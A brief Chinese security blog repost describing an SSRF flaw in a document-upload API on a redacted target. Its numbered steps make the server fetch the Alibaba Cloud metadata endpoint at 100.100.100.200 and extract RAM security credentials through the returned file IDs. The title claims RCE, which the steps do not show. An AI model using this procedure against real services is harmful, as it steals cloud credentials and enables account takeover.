这里略过其他功能点不能暴露太多,不然大师傅会干我。直接来到漏洞点
1.抓取该上传接口的数据包,上传http://100.100.100.200/latest/meta-data
2.发送数据包,获取到该url返回的fileid:f77ade68-b6b2-4aaf-a5bb-56e6a6cc7885
3.利用这里的fileid ,https://xxx.xxx.com/api/findocx/console/anydoc/file/加上fileid即可完成访问
4.进一步利用
进一步利用,上传http://100.100.100.200/latest/meta-data/ram/security-credentials/,获取到fileid 再去拼接https://xxxx.xxxx.com/api/findocx/console/anydoc/file/fileid获取到账号名再重新上传http://100.100.100.200/latest/meta-data/ram/security-credentials/账号名,拿到fileid,再拼接https://XXXX.XXX.com/api/findocx/console/anydoc/file/fileid
原文始发于微信公众号(富贵安全):泥煤的,又一次RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论